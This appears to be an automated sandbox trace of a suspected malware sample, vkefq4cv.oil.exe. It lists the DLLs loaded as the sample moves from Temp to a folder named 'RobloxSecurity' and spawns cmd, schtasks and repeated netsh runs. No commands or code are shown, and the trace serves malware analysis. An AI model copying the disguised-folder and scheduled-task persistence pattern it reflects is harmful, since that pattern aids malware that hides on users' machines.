Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
